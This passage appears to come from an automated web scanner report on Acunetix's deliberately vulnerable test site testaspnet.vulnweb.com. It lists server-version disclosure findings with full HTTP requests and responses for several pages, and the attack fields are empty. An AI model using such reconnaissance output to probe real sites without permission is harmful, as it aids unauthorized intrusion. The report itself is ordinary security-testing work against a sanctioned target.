class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 350 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 18040
Response Body - size: 18,040 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLEirm5BAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGR35lZNwQ8OqxiqiZO/ZZOlJz58" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/robots.txt
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 282 bytes.	GET http://testaspnet.vulnweb.com/robots.txt HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 245 bytes.	HTTP/1.1 200 OK Content-Type: text/plain Last-Modified: Mon, 06 May 2019 12:46:42 GMT Accept-Ranges: bytes ETag: "b0b05ac194d51:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:14 GMT Content-Length: 13
Response Body - size: 13 bytes.	User-agent: *
URL	http://testaspnet.vulnweb.com/rssFeed.aspx
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 324 bytes.	GET http://testaspnet.vulnweb.com/rssFeed.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 220 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/xml; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 2118
Response Body - size: 2,118 bytes.	<rss version="2.0"> <channel> <title>Acunetix testaspnet</title> <link>http://testaspnet.acunetix.com/</link> <description> This is the syndication feed for testaspnet.acunetix.com. </description> <item> <title>Acunetix Vulnerability Scanner Now With Network Security Scans</title> <description> Seamless OpenVAS integration now also available on Windows and Linux </description> <link> http://testaspnet.acunetix.com/ReadNews.aspx?id=0 </link> <author>admin </author> <pubDate> Thu, 16 May 2019 12:32:30 GMT </pubDate> </item> <item> <title>Acunetix Web Vulnerability Scanner beta released!</title> <description> 26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/. </description> <link> http://testaspnet.acunetix.com/ReadNews.aspx?id=3 </link> <author>admin </author> <pubDate> Tue, 08 Nov 2005 11:37:35 GMT </pubDate> </item> <item> <title>Web attacks - can your web applications withstand the force?</title> <description> 21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed. </description> <link> http://testaspnet.acunetix.com/ReadNews.aspx?id=2 </link> <author>admin </author> <pubDate> Tue, 08 Nov 2005 11:35:22 GMT </pubDate> </item> </channel> </rss>
URL	http://testaspnet.vulnweb.com/Signup.aspx
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
